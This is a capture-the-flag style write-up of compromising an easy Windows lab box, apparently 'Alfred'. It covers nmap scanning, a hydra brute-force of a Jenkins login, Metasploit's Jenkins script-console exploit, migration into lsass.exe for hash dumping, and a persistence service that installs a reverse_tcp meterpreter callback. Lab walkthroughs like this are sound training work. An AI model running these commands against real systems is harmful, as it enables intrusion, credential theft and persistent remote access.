- OS: windows
- Difficulty: easy
- Author: talace
Scanning ๐
threader3000.py
1
2
3
4
5
| python3 threader3000.py
Port 80 is open
Port 3389 is open
Port 8080 is open
|
Nmap scan
1
2
3
4
5
6
7
| nmap -p80,3389,8080 -sV -sC -T4 -Pn -oA 10.10.18.104 10.10.18.104
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
3389/tcp open ssl/ms-wbt-server?
| Target_Name: ALFRED
8080/tcp open http Jetty 9.4.z-SNAPSHOT
|
Enumeration ๐ค
Jenkins enumeration
use hydra to brute force login
1
2
3
| hydra -s 8080 -L $userfile -P $passfile $target_ip http-post-form '/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password' -f -o rockyou.txt
FOUND: admin:admin
|
Exploit โ๏ธ
1
2
3
4
5
6
7
8
9
10
11
| use exploit/multi/http/jenkins_script_console
set LHOST 10.8.x.x
set TARGETURI /
set RPORT 8080
set RHOSTS 10.10.x.x
set username admin
set password admin
run
meterpreter >
|
Now that we have a session open, letโs elevate our privileges!
Privilege escalation ๐บ
Switch process for more stable meterpreter stable, because my process was on x86 and i need on x64.
Iโm using lsaas.exe process, so i will be able to dump hash and do more actions for my post-exploit
1
2
3
| ps
676 580 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
|
Migrate to it
1
| meterpreter > migrate 676
|
Now that we have a stable meterpreter..
Letโs retrieve user.txt ๐ค
1
2
3
4
5
| meterpreter > search -f user.txt
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\bruce\Desktop\user.txt 32 2019-10-25 18:22:36 -0400
|
Now root.txt! ๐ผ
1
2
3
4
5
| meterpreter > search -f root.txt
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Windows\System32\config\root.txt 70 2019-10-26 07:36:00 -0400
|
Post-exploitation ๐ผ
Creating a new services in windows that will send a revershell
1
2
3
4
5
| use exploit/windows/local/persistence_service
set payload windows/meterpreter/reverse_tcp
set lport <lport>
set lhost <lhost>
set session <id>
|
Resources ๐
Article: metasploit-module-for-persistence